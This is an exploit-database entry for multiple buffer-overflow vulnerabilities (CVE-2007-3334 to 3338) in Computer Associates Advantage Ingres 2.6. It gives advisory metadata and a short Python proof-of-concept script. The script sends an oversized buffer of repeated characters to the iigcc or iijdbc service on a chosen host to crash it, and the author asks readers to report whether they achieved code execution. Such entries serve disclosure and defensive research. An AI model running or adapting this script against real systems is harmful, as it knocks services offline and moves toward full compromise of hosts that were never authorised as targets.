Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities

vendor:

Advantage Ingres

by:

fdisk

7.5

CVSS

HIGH

Denial of Service

119, 120, 122, 434

CWE

Product Name: Advantage Ingres

Affected Version From: 2.6

Affected Version To: 2.6

Patch Exists: YES

Related CWE: CVE-2007-3334, CVE-2007-3336, CVE-2007-3337, CVE-2007-3338

CPE: a:computer_associates:advantage_ingres:2.6

Metasploit:

Other Scripts:

Platforms Tested: Windows 2003 Server SP1

2010

Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities

This exploit targets the Ingress Database Server included in CA eTrust Secure Content Manager and is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.

Mitigation:

The vulnerability has been fixed in the latest version of the software.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/24585/info

Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.

Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.

# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>

import socket
import sys

if len(sys.argv) != 4:
    print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
    print "Vulnerable Services: iigcc, iijdbc"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]

if service == "iigcc":
        payload = "\x41" * 2106
elif service == "iijdbc":
        payload = "\x41" * 1066
else:
        print "Vulnerable Services: iigcc, iijdbc"
        sys.exit(1)

payload += "\x42" * 4

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)

print service + " crashed"